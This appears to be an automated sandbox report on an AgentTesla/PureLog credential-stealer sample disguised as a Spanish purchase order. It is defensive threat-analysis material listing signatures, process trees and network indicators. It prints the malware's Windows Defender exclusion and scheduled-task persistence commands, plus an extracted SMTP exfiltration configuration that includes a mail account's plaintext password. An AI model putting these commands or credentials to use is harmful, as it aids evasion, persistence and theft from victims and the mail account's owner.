Windows Analysis Report
nOrden_de_compra.exe

Overview

General Information

Sample name: nOrden_de_compra.exe
Analysis ID: 1385592
MD5: 593bb72286c1c2ce5c2456c7d9585a80
SHA1: cb9bf63f9005d5b4f1bcbcf3efead399a1c960a7
SHA256: 84f0a1001a606072b86d8eca2c4d9ccefc71c38ff71d0aaa2f4ae003f802917b
Tags: AgentTesla, exe

Detection

AgentTesla, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Process Patterns NTDS.DIT Exfil
Sigma detected: Suspicious Schtasks From Env Var Folder
Tries to load missing DLLs
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • nOrden_de_compra.exe (PID: 5724 cmdline: C:\Users\user\Desktop\nOrden_de_compra.exe MD5: 593BB72286C1C2CE5C2456C7D9585A80)
    • powershell.exe (PID: 4132 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nOrden_de_compra.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2744 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 2612 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 6464 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nNdsLvHyWi" /XML "C:\Users\user\AppData\Local\Temp\tmpD5F2.tmp MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • nOrden_de_compra.exe (PID: 2216 cmdline: C:\Users\user\Desktop\nOrden_de_compra.exe MD5: 593BB72286C1C2CE5C2456C7D9585A80)
    • nOrden_de_compra.exe (PID: 1460 cmdline: C:\Users\user\Desktop\nOrden_de_compra.exe MD5: 593BB72286C1C2CE5C2456C7D9585A80)
  • nNdsLvHyWi.exe (PID: 6640 cmdline: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe MD5: 593BB72286C1C2CE5C2456C7D9585A80)
    • schtasks.exe (PID: 3576 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nNdsLvHyWi" /XML "C:\Users\user\AppData\Local\Temp\tmpE302.tmp MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 4344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • nNdsLvHyWi.exe (PID: 1176 cmdline: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe MD5: 593BB72286C1C2CE5C2456C7D9585A80)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.triorentacar.ro", "Username": "rezervari@triorentacar.ro", "Password": "trio1289"}
Source | Rule | Description | Author | Strings
00000000.00000002.2116574097.00000000071A0000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0000000F.00000002.4526670149.0000000000433000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
0000000F.00000002.4526670149.0000000000433000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
0000000B.00000002.2148054527.0000000003A78000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
0000000B.00000002.2148054527.0000000003A78000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
(5 of 20 entries shown)

Source | Rule | Description | Author | Strings
0.2.nOrden_de_compra.exe.71a0000.7.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.2.nOrden_de_compra.exe.71a0000.7.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.2.nOrden_de_compra.exe.2cde9dc.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.2.nOrden_de_compra.exe.3ca9970.4.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.2.nOrden_de_compra.exe.7160000.5.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
(5 of 31 entries shown)

                      System Summary

                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nOrden_de_compra.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nOrden_de_compra.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\nOrden_de_compra.exe, ParentImage: C:\Users\user\Desktop\nOrden_de_compra.exe, ParentProcessId: 5724, ParentProcessName: nOrden_de_compra.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nOrden_de_compra.exe, ProcessId: 4132, ProcessName: powershell.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nOrden_de_compra.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nOrden_de_compra.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\nOrden_de_compra.exe, ParentImage: C:\Users\user\Desktop\nOrden_de_compra.exe, ParentProcessId: 5724, ParentProcessName: nOrden_de_compra.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nOrden_de_compra.exe, ProcessId: 4132, ProcessName: powershell.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nNdsLvHyWi" /XML "C:\Users\user\AppData\Local\Temp\tmpE302.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nNdsLvHyWi" /XML "C:\Users\user\AppData\Local\Temp\tmpE302.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe, ParentImage: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe, ParentProcessId: 6640, ParentProcessName: nNdsLvHyWi.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nNdsLvHyWi" /XML "C:\Users\user\AppData\Local\Temp\tmpE302.tmp, ProcessId: 3576, ProcessName: schtasks.exe
                      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 89.32.46.159, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\nOrden_de_compra.exe, Initiated: true, ProcessId: 1460, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49703
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe, CommandLine: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe, NewProcessName: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe, OriginalFileName: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1064, ProcessCommandLine: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe, ProcessId: 6640, ProcessName: nNdsLvHyWi.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nNdsLvHyWi" /XML "C:\Users\user\AppData\Local\Temp\tmpD5F2.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nNdsLvHyWi" /XML "C:\Users\user\AppData\Local\Temp\tmpD5F2.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\Desktop\nOrden_de_compra.exe, ParentImage: C:\Users\user\Desktop\nOrden_de_compra.exe, ParentProcessId: 5724, ParentProcessName: nOrden_de_compra.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nNdsLvHyWi" /XML "C:\Users\user\AppData\Local\Temp\tmpD5F2.tmp, ProcessId: 6464, ProcessName: schtasks.exe
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nOrden_de_compra.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nOrden_de_compra.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\nOrden_de_compra.exe, ParentImage: C:\Users\user\Desktop\nOrden_de_compra.exe, ParentProcessId: 5724, ParentProcessName: nOrden_de_compra.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nOrden_de_compra.exe, ProcessId: 4132, ProcessName: powershell.exe

                      Persistence and Installation Behavior

                      Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nNdsLvHyWi" /XML "C:\Users\user\AppData\Local\Temp\tmpD5F2.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nNdsLvHyWi" /XML "C:\Users\user\AppData\Local\Temp\tmpD5F2.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\Desktop\nOrden_de_compra.exe, ParentImage: C:\Users\user\Desktop\nOrden_de_compra.exe, ParentProcessId: 5724, ParentProcessName: nOrden_de_compra.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nNdsLvHyWi" /XML "C:\Users\user\AppData\Local\Temp\tmpD5F2.tmp, ProcessId: 6464, ProcessName: schtasks.exe
                      No Snort rule has matched

                      AV Detection

                      Source: 0.2.nOrden_de_compra.exe.3fb4308.2.raw.unpack; Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.triorentacar.ro", "Username": "rezervari@triorentacar.ro", "Password": "trio1289"}
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe; ReversingLabs: Detection: 63%
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe; Virustotal: Detection: 43%
                      Source: nOrden_de_compra.exe; ReversingLabs: Detection: 63%
                      Source: nOrden_de_compra.exe; Virustotal: Detection: 43%
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe; Joe Sandbox ML: detected
                      Source: nOrden_de_compra.exe; Joe Sandbox ML: detected
                      Source: nOrden_de_compra.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknown; HTTPS traffic detected: 173.231.16.76:443 -> 192.168.2.6:49702 version: TLS 1.2
                      Source: unknown; HTTPS traffic detected: 173.231.16.76:443 -> 192.168.2.6:49706 version: TLS 1.2
                      Source: nOrden_de_compra.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: rYwr.pdbSHA256$x] source: nOrden_de_compra.exe, nNdsLvHyWi.exe.0.dr
                      Source: Binary string: rYwr.pdb source: nOrden_de_compra.exe, nNdsLvHyWi.exe.0.dr

                      Networking

                      Source: Yara match; File source: 0.2.nOrden_de_compra.exe.3fb4308.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 0.2.nOrden_de_compra.exe.3f77ae8.1.raw.unpack, type: UNPACKEDPE
                      Source: global traffic; TCP traffic: 192.168.2.6:49703 -> 89.32.46.159:587
                      Source: Joe Sandbox View; IP Address: 173.231.16.76
                      Source: Joe Sandbox View; IP Address: 173.231.16.76
                      Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknown; DNS query: name: api.ipify.org
                      Source: unknown; DNS query: name: api.ipify.org
                      Source: unknown; DNS query: name: api.ipify.org
                      Source: global traffic; TCP traffic: 192.168.2.6:49703 -> 89.32.46.159:587
                      Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 | Host: api.ipify.org | Connection: Keep-Alive
                      Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 | Host: api.ipify.org | Connection: Keep-Alive
                      Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 | Host: api.ipify.org | Connection: Keep-Alive
                      Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 | Host: api.ipify.org | Connection: Keep-Alive
                      Source: unknown; DNS traffic detected: queries for: api.ipify.org
                      Source: nOrden_de_compra.exe, 0000000A.00000002.4531607343.0000000002EEC000.00000004.00000800.00020000.00000000.sdmp, nOrden_de_compra.exe, 0000000A.00000002.4543063904.0000000006927000.00000004.00000020.00020000.00000000.sdmp, nOrden_de_compra.exe, 0000000A.00000002.4527441718.00000000011D5000.00000004.00000020.00020000.00000000.sdmp, nOrden_de_compra.exe, 0000000A.00000002.4531607343.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4531554199.0000000002927000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4542926780.0000000005E2A000.00000004.00000020.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4527302834.0000000000BE9000.00000004.00000020.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4531554199.00000000029BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                      Source: nOrden_de_compra.exe, 0000000A.00000002.4527441718.00000000011D5000.00000004.00000020.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4542926780.0000000005E2A000.00000004.00000020.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4527302834.0000000000BE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                      Source: nOrden_de_compra.exe, 0000000A.00000002.4531607343.0000000002EEC000.00000004.00000800.00020000.00000000.sdmp, nOrden_de_compra.exe, 0000000A.00000002.4543063904.0000000006927000.00000004.00000020.00020000.00000000.sdmp, nOrden_de_compra.exe, 0000000A.00000002.4527441718.00000000011D5000.00000004.00000020.00020000.00000000.sdmp, nOrden_de_compra.exe, 0000000A.00000002.4527441718.0000000001140000.00000004.00000020.00020000.00000000.sdmp, nOrden_de_compra.exe, 0000000A.00000002.4531607343.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4531554199.0000000002927000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4542926780.0000000005E2A000.00000004.00000020.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4527302834.0000000000BE9000.00000004.00000020.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4531554199.00000000029BD000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4527302834.0000000000B67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                      Source: nOrden_de_compra.exe, 0000000A.00000002.4531607343.0000000002EEC000.00000004.00000800.00020000.00000000.sdmp, nOrden_de_compra.exe, 0000000A.00000002.4543063904.0000000006927000.00000004.00000020.00020000.00000000.sdmp, nOrden_de_compra.exe, 0000000A.00000002.4527441718.00000000011D5000.00000004.00000020.00020000.00000000.sdmp, nOrden_de_compra.exe, 0000000A.00000002.4531607343.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4531554199.0000000002927000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4527302834.0000000000BE9000.00000004.00000020.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4531554199.00000000029BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/cPanelIncCertificationAuthority.crl0
                      Source: nOrden_de_compra.exe, 0000000A.00000002.4543063904.00000000068E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                      Source: nOrden_de_compra.exe, 0000000A.00000002.4531607343.0000000002EEC000.00000004.00000800.00020000.00000000.sdmp, nOrden_de_compra.exe, 0000000A.00000002.4531607343.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4531554199.0000000002927000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4531554199.00000000029BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.triorentacar.ro
                      Source: nOrden_de_compra.exe, 0000000A.00000002.4531607343.0000000002EEC000.00000004.00000800.00020000.00000000.sdmp, nOrden_de_compra.exe, 0000000A.00000002.4543063904.0000000006927000.00000004.00000020.00020000.00000000.sdmp, nOrden_de_compra.exe, 0000000A.00000002.4527441718.00000000011D5000.00000004.00000020.00020000.00000000.sdmp, nOrden_de_compra.exe, 0000000A.00000002.4527441718.0000000001140000.00000004.00000020.00020000.00000000.sdmp, nOrden_de_compra.exe, 0000000A.00000002.4531607343.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4531554199.0000000002927000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4542926780.0000000005E2A000.00000004.00000020.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4527302834.0000000000BE9000.00000004.00000020.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4531554199.00000000029BD000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4527302834.0000000000B67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: nOrden_de_compra.exe, 00000000.00000002.2113140924.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp, nOrden_de_compra.exe, 0000000A.00000002.4531607343.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000B.00000002.2146832318.00000000027FF000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4531554199.00000000028B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: nOrden_de_compra.exe, 0000000A.00000002.4531607343.0000000002EEC000.00000004.00000800.00020000.00000000.sdmp, nOrden_de_compra.exe, 0000000A.00000002.4531607343.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4531554199.0000000002927000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4531554199.00000000029BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://triorentacar.ro
                      Source: nNdsLvHyWi.exe, 0000000F.00000002.4542926780.0000000005E2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.8
                      Source: nOrden_de_compra.exe, 00000000.00000002.2114084999.0000000003F77000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000B.00000002.2148054527.0000000003A78000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4526670149.0000000000433000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                      Source: nOrden_de_compra.exe, 00000000.00000002.2114084999.0000000003F77000.00000004.00000800.00020000.00000000.sdmp, nOrden_de_compra.exe, 0000000A.00000002.4531607343.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000B.00000002.2148054527.0000000003A78000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4526670149.0000000000433000.00000040.00000400.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4531554199.00000000028B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                      Source: nOrden_de_compra.exe, 0000000A.00000002.4531607343.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4531554199.00000000028B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                      Source: nOrden_de_compra.exe, 0000000A.00000002.4531607343.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4531554199.00000000028B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                      Source: nOrden_de_compra.exe, 0000000A.00000002.4531607343.0000000002EEC000.00000004.00000800.00020000.00000000.sdmp, nOrden_de_compra.exe, 0000000A.00000002.4543063904.0000000006927000.00000004.00000020.00020000.00000000.sdmp, nOrden_de_compra.exe, 0000000A.00000002.4527441718.00000000011D5000.00000004.00000020.00020000.00000000.sdmp, nOrden_de_compra.exe, 0000000A.00000002.4531607343.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4531554199.0000000002927000.00000004.00000800.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4527302834.0000000000BE9000.00000004.00000020.00020000.00000000.sdmp, nNdsLvHyWi.exe, 0000000F.00000002.4531554199.00000000029BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                      Source: unknown; Network traffic detected: HTTP traffic on port 49706 -> 443
                      Source: unknown; Network traffic detected: HTTP traffic on port 49702 -> 443
                      Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49706
                      Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49702
                      Source: unknown; HTTPS traffic detected: 173.231.16.76:443 -> 192.168.2.6:49702 version: TLS 1.2
                      Source: unknown; HTTPS traffic detected: 173.231.16.76:443 -> 192.168.2.6:49706 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      Source: 0.2.nOrden_de_compra.exe.3fb4308.2.raw.unpack, K6jmfEUYzg.cs; .Net Code: vjB
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe; Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\nOrden_de_compra.exe
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe; Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe; Window created: window name: CLIPBRDWNDCLASS
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe; Window created: window name: CLIPBRDWNDCLASS

                      System Summary

                      Source: 0.2.nOrden_de_compra.exe.3fb4308.2.unpack, type: UNPACKEDPE; Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers; Author: ditekSHen
                      Source: 11.2.nNdsLvHyWi.exe.3a78c38.3.unpack, type: UNPACKEDPE; Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers; Author: ditekSHen
                      Source: 0.2.nOrden_de_compra.exe.3f77ae8.1.unpack, type: UNPACKEDPE; Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers; Author: ditekSHen
                      Source: 11.2.nNdsLvHyWi.exe.3ab5458.2.unpack, type: UNPACKEDPE; Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers; Author: ditekSHen
                      Source: 11.2.nNdsLvHyWi.exe.3ab5458.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers; Author: ditekSHen
                      Source: 11.2.nNdsLvHyWi.exe.3a78c38.3.raw.unpack, type: UNPACKEDPE; Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers; Author: ditekSHen
                      Source: 0.2.nOrden_de_compra.exe.3fb4308.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers; Author: ditekSHen
                      Source: 0.2.nOrden_de_compra.exe.3f77ae8.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers; Author: ditekSHen
